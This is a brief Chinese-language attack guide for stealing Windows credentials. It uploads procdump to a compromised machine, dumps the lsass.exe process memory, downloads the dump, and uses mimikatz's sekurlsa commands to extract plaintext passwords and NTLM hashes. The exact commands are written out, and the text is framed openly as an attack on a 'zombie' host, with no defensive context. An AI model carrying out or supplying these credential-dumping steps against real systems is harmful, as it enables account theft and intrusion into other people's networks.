1、procdump
上传procdump.exe从lsass.exe获取密码文件,在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的)
2、dump密码文件的命令
在肉鸡上执行procdump64.exe -accepteula -ma lsass.exe lsass.dmp 注意64位32位
3、下载密码文件到本地密码文件结合mimikatz解密获取密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
